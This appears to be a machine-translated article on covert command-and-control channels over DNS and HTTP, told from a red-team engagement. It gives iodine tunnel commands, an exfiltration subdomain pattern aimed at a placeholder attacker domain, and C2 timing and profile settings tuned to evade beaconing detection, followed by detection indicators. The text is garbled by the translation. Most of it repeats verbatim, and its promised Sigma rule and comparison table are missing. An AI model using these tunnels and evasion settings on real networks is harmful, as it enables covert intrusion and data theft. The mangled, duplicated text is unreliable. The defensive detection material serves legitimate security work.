At red team, operations in the financial sector, we raised dnscat2 on the rented VPS, prescribed the NS delegation and chased the teams through TXT recordings for two days, simultaneously unloading hashes from NTDS.dit. Suricata was silent on the perimeter. SIEM is not a single alerta. SOC analysts dug in the HTTP logic of the proxy, and DNS traffic quietly went through the standard corporate rezoalver - without controlling the length of requests, without checking the entropy of subdomains. Hidden C2 data channels work precisely because DNS and HTTP are two protocols that the infrastructure trusts by default: the firewalls misses, the proxy does not fit in, baseline no one built.
dnscat2 is a tool designed to create an encrypted control and control channel (C&C) via the DNS protocol, which is an effective tunnel to exit almost any network.
NS (Name Server) are name servers that are part of the DNS system.
Suricata is a high-performance open-source software for network analysis and threat detection used in the field of cybersecurity.
Business Logic of Hidden C2 Channels and a Place in Killing Chas
Hidden C2 channel is not an end in itself. This is an infrastructure element, without which it does not work a single step after the initial penetration. In MITRE ATT&CK, hidden channels cover several tactics at once: Command and Control - DNST1071.004), Protocol Tunneling (T1572), Protocol Impersonation (T101.003), Steganography (T1001.002), Domain Fronting (T1090.004), Domain Generation Algorithms (T1568.002) - and Exfiltration - Exfiltration Over C2 Channel (T1041Exfiltration Over Unencrypted Non-C2 ProtocolT1048.003)
Position in killline: initial: access (phishing, compromised service) -> foothold (dropper puts an agent, agent initiates an outgoing connection) -> C2 channel (DNS tunneling or HTTP cover channel) -> post-exploitation (lateral, privilege escalation, credential dumping through the channel) -> exfiltration (unloading data through the same channel T. While the channel is alive - attacking inside the network.
In the SUNBURST (SolarWinds, 2020) DNS queries to subdomains avsvmcloud.com worked as a stage-1 selector: the coded victim identifier was transmitted to the subdomain, DNS replies (CNAME-entered) classified victims. For selected purposes, the second stage was launched - the delivery of TEARDROP and Cobat Strike Beacon with HTTP/HTTPS C2 (according to FireEye / Mandiant, December 2020). In the Decoy Dog campaign (2023, according to Infoblox) - a cluster of activity with Pupy RAT over DNS C2 via TXT records. Two years difference, the same idea: no one watches DNS traffic.
Pupy is a cross-platform RAT and an open-source post-open-code framework written primarily in Python.
DNS tunneling - mechanics and tools
How DNS covert channel works
DNS tunneling (T1071.004, Command and Control) operates a regular mechanism of recursive name resolution. The attacker registers the domain and raises the authoritative DNS server. The agent on the compromised host encodes data into the subdomain: base64encodeddata.c2.attacker.tld. The corporate rezoster transmits a request for a recursion chain to the attacker’s server. The C2 server decodes the subdomain, pulls out the data and returns the command to TXT, CNAME or A-records.
Why it works: DNS traffic is passed by firewalls in both directions - name resolution is needed for the basic network. According to ICANN, DNS traffic often goes out even before the user authorization, which allows you to bypass the captive portals. Canal speed - pain: maximum length of DNS-mark 63 bytes, full name 253 bytes. These are Kbit/s. For C2-commands, for the extillation of terabytes - forget.
DNS tunneling tools and their artifacts
iodine - tunnels IPv4 via DNS, creates a virtual interface dns0. Supports records types A, TXT, MX, CNAME, NULL. According to Netskope, in the idle state, the client interviews a fixed-frequency server - and this is the main detect-artifactory. In the packaged dump stick out unprintable characters in DNS queries. Server launch: iodined -f -c -P password 10.10.10.1 tunnel.domain.tld, customer: iodine -f -P password tunnel.domain.tld. Open-source project on GitHub (support status should be checked by the date of the last comet before use).
[Applicable to: internal pentest, bypass captive portal. Requires direct access to a DNS resolder that misses requests out. Doesn't work if the corporate DNS is forcibly proxyed through DNS-over-HTTPS]
dnscat2 - C2-framework, which works exclusively through DNS. Encrypted session with fingerprint verification, shell, uploading and uploading files. According to Netskope, the characteristic artifact is a consistent hex pattern in hostname DNS queries. When connecting, the client reports fingerprint: "Poxes Story Peace Harp Lordy Flacks" - both sides confirm the integrity of encryption. Project on GitHub (iagox86/dnscat2), server on Ruby, client on C.
[Applicable: red team C2 when blocking HTTP/HTTPS output, internal penttest. It can work with direct IP server without domain registration. Not suitable for extilting large volumes - the channel is slow]
Cobalt Strike DNS beacon - commercial C2-framework with DNS beacon via TXT, A and AAAAA records. Supports jitter and sleep to simulate irregular traffic. DNS beacon is used as fallback: switching to HTTPS when accessible, rollback to DNS when locked. Starting with Cobalt Strike 4.9 (Fortra, September 2023), DNS beacon has redesigned - pure DNS C2 has intermittent limitations, hybrid DNS+HTP is recommended for full-featured work.
[Applicable: red team operations with long-term presence, operations with multiple channels. Requires a license. DNS beacon slower than HTTP - for interactive work is inconvenient]
dns2tcp - tunnels TCP-connections through DNS queries. Supports TXT and KEY records. Open-source project (alex-sector/dns2tcp) Suitable for point exfiltration and TCP emissions in limited environments.
From real campaigns: APT-group OilRig used DNS tunneling to map the internal network before escalating the attack (according to Palo Alto Networks). B1txor20 - GNU/Linux-backador (found in 2022), climbed through Log4Shell and used DNS tunneling as a C2 channel (according to 360 Netlab, February 2022).
When DNS tunneling doesn't work
Malleable C2, domain fronting and stagnographic channels
HTTP covert channels (T101.003, T1572) work at a different level: instead of operating the permitted protocol, they mimic specific legitimate services. The hidden channel via HTTP is disguised so that in the proxy and SIEM logs, queries look like normal web traffic.
In Cobalt Strike Smallable C2 profiles, allow you to completely rewrite HTTP questionnaire beacon: URI, headers, User-Agent, Content-Type, body. In practice, I set up profiles that simulate traffic to CDN - at the proxy log level, query looked like appeals to a legitimate CDN domain with a valid User-Agent and Content-Type: application/octet-stream. Timing-patterns were picked up by hand: sleep 60 seconds, jitter 37% - so as not to trigger the beaconing detect in RITA.
Domain Fronting (T1090.004) - sending TLS ClientHello from SNI a legitimate CDN domain, and the HTTP Host header with the C2 domain. The CDN routes a C2 server query, while only a legitimate domain is visible in TLS-logs and proxy. The technique has lost its versatility: Google Cloud and AWS CloudFront closed the domain fronting in April 2018, Microsoft announced the blocking at Azure in March 2021, technical implementation ended in November 2022 (Azure Front Door enforcement, Azure Network Security blog). Individual CDN (Fastly, Cloudflare Workers) allowed similar configurations longer - for a red team it is worth checking the current policies of a particular provider before each project.
[Applicable: external pentest, red team with perimeter proxy inspection. It does not work at the TLS inspection, which checks SNI and Host. Requires a CDN provider that does not block domain fronting]
Steganographic HTTP channels (T1001.002) - the data are encoded in visually normal objects: EXIF-metadatad images, CSS files, HTML comments. According to Varonis, there are cases when malware received a list of C2 servers from GPS coordinates in photos and from comments on social networks. The speed of transmission is small, but stealth is maximum - standard IDS / IPS does not analyze the content of images for hidden data.
Sliver - open-source C2-frame with support for HTTP/HTTPS, DNS and mTSS channels. HTTP profiles are less flexible than Malleable C2, but base mimicry is covered. Written on Go, which creates a specific JA3-fingerprint TLS connection, different from browser. In practice, this means: if the defenders are set up with JA3 whitelist - Sliver-agent burns on the first request.
Restrictions of HTTP covert channels
Detection of DNS tunneling: signs in traffic
A number of academic studies (Buczak & Guven, 2016; Nadler et al., 2019) showed that ML-classifiers based on statistical signs of subdomains reach accuracy above 95% when DNS is detected by tunneling. The analysis of malvar samples and tunneling tools confirms: each leaves unique patterns in metadata - length, entropy, frequency, types of records. But the ML-model will not unfold every SOC. Basic indicators are caught by standard means.
Five signs of DNS tunneling in logs:
1. The length of the subdomain - a normal query contains 10-30 characters. iodine and dnscat2 during default settings generate subdomains with a length of 50-63 characters. Threshold |query| > 50Zeek dns.log is the first filter.
2. Request entropy - base32/base64-coded data give entropy 4.5-5.5 bits per symbol (Shannon entropy). Legitimate domains - 2.5-3.5. Considered in Zeek or SIEM on the field query.
3. The volume of requests to one domain is hundreds of TXT queries from one host to one domain per minute. Baseline is built on dns.log in 7-14 days.
4. Atypical recording types - Mass TXT and NULL requests. iodine selects the most productive type of entries (NULL/PRIVATE/TXT/SRF/MX/CCNAME/A) during handshake; in NULL filtration environments - usually TXT. dnscat2 - TXT and CNAME.
5. Fixed frequency - iPod in idle mode interviews the server at a constant interval (Confirmed by Netskope). Frequency without jitter - beaconing signal.
Binding to specific products:
• Zeek : dns.log with fields query, qtype_name, rcode- filtering by length and type of recording covers default configurations of DNS tunneling
• SuricataSuricata: ET Open rules for iodine and dnscat2 by magictes. Do a change of encoding, but catch out-of-the-box
• Palo Alto PA-series (App-ID): defines DNS tunneling as an application category, blocks at the security policy level
• CrowdStrike Falcon : Falcon Insight detects DNS beaconing by endpoint telemetry - monitors DNS-requests of specific processes
• Elastic 8.x+ : built-in ML tasks for DNS anomaly detection - unusual activity DNS, rare DNS queries
HTTP C2: Detects on Behavior
Detection of HTTP covert channels is based on behavioral anomalies:
• Beaconing - RITA (Real Intelligence Threat Analytics) analyzes Zeek conn.log and HTTP logs, calculates the frequencyliness score. Cobalt Strike with jitter < 30% is detected stable. With jitter 50%+ is already more interesting - but RITA still builds distribution and is looking for statistical emissions.
• JA3 mismatch - the process is declared by User-Agent Chrome, and JA3-fingerprint corresponds to the Go/C# TLS-wall. Elastic 8.x+ with the TLS fingerprinting and CrowdStrike Falcon module is compared to JA3 with whitelist legitimate applications.
• Entropy body - encrypted C2 data in an HTTP answer give a high entropy, atypical for HTML / JSON. Zeek with file analysis calculates the entropy of the loaded objects.
Example of Sigma-rules for DNS tunneling detection:
Comparison of hidden C2 channels tools
dnscat2 is a tool designed to create an encrypted control and control channel (C&C) via the DNS protocol, which is an effective tunnel to exit almost any network.
NS (Name Server) are name servers that are part of the DNS system.
Suricata is a high-performance open-source software for network analysis and threat detection used in the field of cybersecurity.
Business Logic of Hidden C2 Channels and a Place in Killing Chas
Hidden C2 channel is not an end in itself. This is an infrastructure element, without which it does not work a single step after the initial penetration. In MITRE ATT&CK, hidden channels cover several tactics at once: Command and Control - DNST1071.004), Protocol Tunneling (T1572), Protocol Impersonation (T101.003), Steganography (T1001.002), Domain Fronting (T1090.004), Domain Generation Algorithms (T1568.002) - and Exfiltration - Exfiltration Over C2 Channel (T1041Exfiltration Over Unencrypted Non-C2 ProtocolT1048.003)
Position in killline: initial: access (phishing, compromised service) -> foothold (dropper puts an agent, agent initiates an outgoing connection) -> C2 channel (DNS tunneling or HTTP cover channel) -> post-exploitation (lateral, privilege escalation, credential dumping through the channel) -> exfiltration (unloading data through the same channel T. While the channel is alive - attacking inside the network.
In the SUNBURST (SolarWinds, 2020) DNS queries to subdomains avsvmcloud.com worked as a stage-1 selector: the coded victim identifier was transmitted to the subdomain, DNS replies (CNAME-entered) classified victims. For selected purposes, the second stage was launched - the delivery of TEARDROP and Cobat Strike Beacon with HTTP/HTTPS C2 (according to FireEye / Mandiant, December 2020). In the Decoy Dog campaign (2023, according to Infoblox) - a cluster of activity with Pupy RAT over DNS C2 via TXT records. Two years difference, the same idea: no one watches DNS traffic.
Pupy is a cross-platform RAT and an open-source post-open-code framework written primarily in Python.
DNS tunneling - mechanics and tools
How DNS covert channel works
DNS tunneling (T1071.004, Command and Control) operates a regular mechanism of recursive name resolution. The attacker registers the domain and raises the authoritative DNS server. The agent on the compromised host encodes data into the subdomain: base64encodeddata.c2.attacker.tld. The corporate rezoster transmits a request for a recursion chain to the attacker’s server. The C2 server decodes the subdomain, pulls out the data and returns the command to TXT, CNAME or A-records.
Why it works: DNS traffic is passed by firewalls in both directions - name resolution is needed for the basic network. According to ICANN, DNS traffic often goes out even before the user authorization, which allows you to bypass the captive portals. Canal speed - pain: maximum length of DNS-mark 63 bytes, full name 253 bytes. These are Kbit/s. For C2-commands, for the extillation of terabytes - forget.
DNS tunneling tools and their artifacts
iodine - tunnels IPv4 via DNS, creates a virtual interface dns0. Supports records types A, TXT, MX, CNAME, NULL. According to Netskope, in the idle state, the client interviews a fixed-frequency server - and this is the main detect-artifactory. In the packaged dump stick out unprintable characters in DNS queries. Server launch: iodined -f -c -P password 10.10.10.1 tunnel.domain.tld, customer: iodine -f -P password tunnel.domain.tld. Open-source project on GitHub (support status should be checked by the date of the last comet before use).
[Applicable to: internal pentest, bypass captive portal. Requires direct access to a DNS resolder that misses requests out. Doesn't work if the corporate DNS is forcibly proxyed through DNS-over-HTTPS]
dnscat2 - C2-framework, which works exclusively through DNS. Encrypted session with fingerprint verification, shell, uploading and uploading files. According to Netskope, the characteristic artifact is a consistent hex pattern in hostname DNS queries. When connecting, the client reports fingerprint: "Poxes Story Peace Harp Lordy Flacks" - both sides confirm the integrity of encryption. Project on GitHub (iagox86/dnscat2), server on Ruby, client on C.
[Applicable: red team C2 when blocking HTTP/HTTPS output, internal penttest. It can work with direct IP server without domain registration. Not suitable for extilting large volumes - the channel is slow]
Cobalt Strike DNS beacon - commercial C2-framework with DNS beacon via TXT, A and AAAAA records. Supports jitter and sleep to simulate irregular traffic. DNS beacon is used as fallback: switching to HTTPS when accessible, rollback to DNS when locked. Starting with Cobalt Strike 4.9 (Fortra, September 2023), DNS beacon has redesigned - pure DNS C2 has intermittent limitations, hybrid DNS+HTP is recommended for full-featured work.
[Applicable: red team operations with long-term presence, operations with multiple channels. Requires a license. DNS beacon slower than HTTP - for interactive work is inconvenient]
dns2tcp - tunnels TCP-connections through DNS queries. Supports TXT and KEY records. Open-source project (alex-sector/dns2tcp) Suitable for point exfiltration and TCP emissions in limited environments.
From real campaigns: APT-group OilRig used DNS tunneling to map the internal network before escalating the attack (according to Palo Alto Networks). B1txor20 - GNU/Linux-backador (found in 2022), climbed through Log4Shell and used DNS tunneling as a C2 channel (according to 360 Netlab, February 2022).
When DNS tunneling doesn't work
Malleable C2, domain fronting and stagnographic channels
HTTP covert channels (T101.003, T1572) work at a different level: instead of operating the permitted protocol, they mimic specific legitimate services. The hidden channel via HTTP is disguised so that in the proxy and SIEM logs, queries look like normal web traffic.
In Cobalt Strike Smallable C2 profiles, allow you to completely rewrite HTTP questionnaire beacon: URI, headers, User-Agent, Content-Type, body. In practice, I set up profiles that simulate traffic to CDN - at the proxy log level, query looked like appeals to a legitimate CDN domain with a valid User-Agent and Content-Type: application/octet-stream. Timing-patterns were picked up by hand: sleep 60 seconds, jitter 37% - so as not to trigger the beaconing detect in RITA.
Domain Fronting (T1090.004) - sending TLS ClientHello from SNI a legitimate CDN domain, and the HTTP Host header with the C2 domain. The CDN routes a C2 server query, while only a legitimate domain is visible in TLS-logs and proxy. The technique has lost its versatility: Google Cloud and AWS CloudFront closed the domain fronting in April 2018, Microsoft announced the blocking at Azure in March 2021, technical implementation ended in November 2022 (Azure Front Door enforcement, Azure Network Security blog). Individual CDN (Fastly, Cloudflare Workers) allowed similar configurations longer - for a red team it is worth checking the current policies of a particular provider before each project.
[Applicable: external pentest, red team with perimeter proxy inspection. It does not work at the TLS inspection, which checks SNI and Host. Requires a CDN provider that does not block domain fronting]
Steganographic HTTP channels (T1001.002) - the data are encoded in visually normal objects: EXIF-metadatad images, CSS files, HTML comments. According to Varonis, there are cases when malware received a list of C2 servers from GPS coordinates in photos and from comments on social networks. The speed of transmission is small, but stealth is maximum - standard IDS / IPS does not analyze the content of images for hidden data.
Sliver - open-source C2-frame with support for HTTP/HTTPS, DNS and mTSS channels. HTTP profiles are less flexible than Malleable C2, but base mimicry is covered. Written on Go, which creates a specific JA3-fingerprint TLS connection, different from browser. In practice, this means: if the defenders are set up with JA3 whitelist - Sliver-agent burns on the first request.
Restrictions of HTTP covert channels
Detection of DNS tunneling: signs in traffic
A number of academic studies (Buczak & Guven, 2016; Nadler et al., 2019) showed that ML-classifiers based on statistical signs of subdomains reach accuracy above 95% when DNS is detected by tunneling. The analysis of malvar samples and tunneling tools confirms: each leaves unique patterns in metadata - length, entropy, frequency, types of records. But the ML-model will not unfold every SOC. Basic indicators are caught by standard means.
Five signs of DNS tunneling in logs:
1. The length of the subdomain - a normal query contains 10-30 characters. iodine and dnscat2 during default settings generate subdomains with a length of 50-63 characters. Threshold |query| > 50Zeek dns.log is the first filter.
2. Request entropy - base32/base64-coded data give entropy 4.5-5.5 bits per symbol (Shannon entropy). Legitimate domains - 2.5-3.5. Considered in Zeek or SIEM on the field query.
3. The volume of requests to one domain is hundreds of TXT queries from one host to one domain per minute. Baseline is built on dns.log in 7-14 days.
4. Atypical recording types - Mass TXT and NULL requests. iodine selects the most productive type of entries (NULL/PRIVATE/TXT/SRF/MX/CCNAME/A) during handshake; in NULL filtration environments - usually TXT. dnscat2 - TXT and CNAME.
5. Fixed frequency - iPod in idle mode interviews the server at a constant interval (Confirmed by Netskope). Frequency without jitter - beaconing signal.
Binding to specific products:
• Zeek : dns.log with fields query, qtype_name, rcode- filtering by length and type of recording covers default configurations of DNS tunneling
• SuricataSuricata: ET Open rules for iodine and dnscat2 by magictes. Do a change of encoding, but catch out-of-the-box
• Palo Alto PA-series (App-ID): defines DNS tunneling as an application category, blocks at the security policy level
• CrowdStrike Falcon : Falcon Insight detects DNS beaconing by endpoint telemetry - monitors DNS-requests of specific processes
• Elastic 8.x+ : built-in ML tasks for DNS anomaly detection - unusual activity DNS, rare DNS queries
HTTP C2: Detects on Behavior
Detection of HTTP covert channels is based on behavioral anomalies:
• Beaconing - RITA (Real Intelligence Threat Analytics) analyzes Zeek conn.log and HTTP logs, calculates the frequencyliness score. Cobalt Strike with jitter < 30% is detected stable. With jitter 50%+ is already more interesting - but RITA still builds distribution and is looking for statistical emissions.
• JA3 mismatch - the process is declared by User-Agent Chrome, and JA3-fingerprint corresponds to the Go/C# TLS-wall. Elastic 8.x+ with the TLS fingerprinting and CrowdStrike Falcon module is compared to JA3 with whitelist legitimate applications.
• Entropy body - encrypted C2 data in an HTTP answer give a high entropy, atypical for HTML / JSON. Zeek with file analysis calculates the entropy of the loaded objects.
Example of Sigma-rules for DNS tunneling detection:
This is a skeleton - in the worker SIEM (MaxPatrol SIEM, Elastic, Splunk) it is added to the calculation of entropy by means of the platform and the threshold shannon_entropy > 4.0.
Comparison of hidden C2 channels tools
